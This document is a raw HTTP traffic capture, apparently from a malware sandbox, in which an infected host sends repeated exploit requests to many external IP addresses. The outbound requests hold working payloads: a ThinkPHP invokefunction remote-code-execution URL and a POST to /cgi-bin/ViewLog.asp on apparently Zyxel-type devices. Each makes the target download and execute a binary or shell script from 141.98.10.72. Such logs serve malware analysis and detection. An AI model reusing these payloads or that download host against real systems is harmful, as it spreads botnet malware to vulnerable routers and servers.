Feb 14, 2024 09:29:24.846277952 CET	479	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 257 Expires: Wed, 14 Feb 2024 08:29:24 GMT Date: Wed, 14 Feb 2024 08:29:24 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 38 34 35 65 36 63 63 31 26 23 34 36 3b 31 37 30 37 38 39 39 33 36 34 26 23 34 36 3b 34 63 32 30 61 64 32 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.845e6cc1.1707899364.4c20ad2</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
238	192.168.2.15	35680	95.216.240.143	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:24.661179066 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:24.886746883 CET	435	IN	HTTP/1.1 400 Bad Request Date: Wed, 14 Feb 2024 08:29:24 GMT Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k Content-Length: 226 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
239	192.168.2.15	58534	95.86.90.1	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:24.733603954 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
240	192.168.2.15	52658	95.214.134.48	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:24.833034039 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:25.058795929 CET	932	IN	HTTP/1.1 400 Bad Request Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 681 date: Wed, 14 Feb 2024 08:29:23 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 30 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 49 74 20 69 73 20 6e 6f 74 20 61 20 76 61 6c 69 64 20 72 65 71 75 65 73 74 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 400 Bad Request</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">400</h1><h2 style="margin-top:20px;font-size: 30px;">Bad Request</h2><p>It is not a valid request!</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
241	192.168.2.15	58762	95.100.182.224	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:24.857767105 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:25.108834982 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 14 Feb 2024 08:29:24 GMT Date: Wed, 14 Feb 2024 08:29:24 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 33 37 32 38 66 37 34 38 26 23 34 36 3b 31 37 30 37 38 39 39 33 36 34 26 23 34 36 3b 32 35 38 31 62 39 32 32 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.3728f748.1707899364.2581b922</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
242	192.168.2.15	59590	95.85.71.191	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:24.925955057 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:25.240978003 CET	321	IN	HTTP/1.1 400 Bad Request Server: nginx/1.20.1 Date: Wed, 14 Feb 2024 08:29:25 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.20.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
243	192.168.2.15	48300	112.168.102.29	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:26.534410954 CET	319	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:26.822865963 CET	149	IN	HTTP/1.0 400 Bad Request Content-Type: text/html Content-Length: 345 Connection: close Date: Wed, 14 Feb 2024 08:29:26 GMT Server: WebServer
Feb 14, 2024 09:29:26.822901964 CET	345	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

Session ID	Source IP	Source Port	Destination IP	Destination Port
244	192.168.2.15	51780	112.200.187.9	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:27.149485111 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:27.486052036 CET	35	IN	HTTP/1.0 302 Redirect
Feb 14, 2024 09:29:27.486063004 CET	44	IN	Data Raw: 44 61 74 65 3a 20 57 65 64 20 46 65 62 20 31 34 20 31 36 3a 32 39 3a 32 39 20 32 30 32 34 0d 0a Data Ascii: Date: Wed Feb 14 16:29:29 2024
Feb 14, 2024 09:29:27.486074924 CET	82	IN	Data Raw: 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a Data Ascii: Pragma: no-cacheCache-Control: no-cache, no-store, must-revalidate
Feb 14, 2024 09:29:27.486085892 CET	37	IN	Data Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a Data Ascii: Content-Type: text/html
Feb 14, 2024 09:29:27.486104012 CET	41	IN	Data Raw: 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 53 41 4d 45 4f 52 49 47 49 4e 0d 0a Data Ascii: X-Frame-Options: SAMEORIGIN
Feb 14, 2024 09:29:27.486115932 CET	44	IN	Data Raw: 58 2d 58 53 53 2d 50 72 6f 74 65 63 74 69 6f 6e 3a 31 3b 20 6d 6f 64 65 3d 62 6c 6f 63 6b 0d 0a Data Ascii: X-XSS-Protection:1; mode=block
Feb 14, 2024 09:29:27.486128092 CET	44	IN	Data Raw: 58 2d 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2d 4f 70 74 69 6f 6e 73 3a 6e 6f 73 6e 69 66 66 0d 0a Data Ascii: X-Content-Type-Options:nosniff
Feb 14, 2024 09:29:27.486140966 CET	30	IN	Data Raw: 46 65 61 74 75 72 65 2d 50 6f 6c 69 63 79 3a 20 0d 0a Data Ascii: Feature-Policy:
Feb 14, 2024 09:29:27.486152887 CET	71	IN	Data Raw: 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 30 30 3b 20 69 6e 63 6c 75 64 65 53 75 62 44 6f 6d 61 69 6e 73 0d 0a Data Ascii: Strict-Transport-Security: max-age=300; includeSubDomains
Feb 14, 2024 09:29:27.486165047 CET	40	IN	Data Raw: 58 2d 44 6f 77 6e 6c 6f 61 64 2d 4f 70 74 69 6f 6e 73 3a 20 6e 6f 6f 70 65 6e 0d 0a Data Ascii: X-Download-Options: noopen
Feb 14, 2024 09:29:27.486179113 CET	347	IN	Data Raw: 58 2d 50 65 72 6d 69 74 74 65 64 2d 43 72 6f 73 73 2d 44 6f 6d 61 69 6e 2d 50 6f 6c 69 63 69 65 73 3a 20 6d 61 73 74 65 72 2d 6f 6e 6c 79 0d 0a 52 65 66 65 72 72 65 72 2d 50 6f 6c 69 63 79 3a 20 6e 6f 2d 72 65 66 65 72 72 65 72 2d 77 68 65 6e 2d Data Ascii: X-Permitted-Cross-Domain-Policies: master-onlyReferrer-Policy: no-referrer-when-downgradeLast-Modified: Location: https://112.200.187.9<html><head></head><body>This document has moved to a new <a href="https://112.200.187.9">loca

Session ID	Source IP	Source Port	Destination IP	Destination Port
245	192.168.2.15	34188	112.213.39.95	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:27.776715994 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:28.083549023 CET	502	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Wed, 14 Feb 2024 08:29:27 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
246	192.168.2.15	39526	112.60.15.224	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:28.156474113 CET	319	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:28.537240982 CET	293	IN	HTTP/1.1 400 Bad Request Server: stgw Date: Wed, 14 Feb 2024 08:29:28 GMT Content-Type: text/html Content-Length: 149 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 73 74 67 77 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>stgw</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
247	192.168.2.15	51744	85.84.232.199	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:29.254918098 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:29.499011993 CET	145	IN	HTTP/1.1 401 Unauthorized WWW-Authenticate: Basic realm="Network Camera" Content-Type: text/html Server: Network Camera Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
248	192.168.2.15	38018	95.87.234.149	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:29.276118994 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:30.458193064 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:31.838042974 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:34.745981932 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:40.377816916 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:51.385518074 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:14.680972099 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
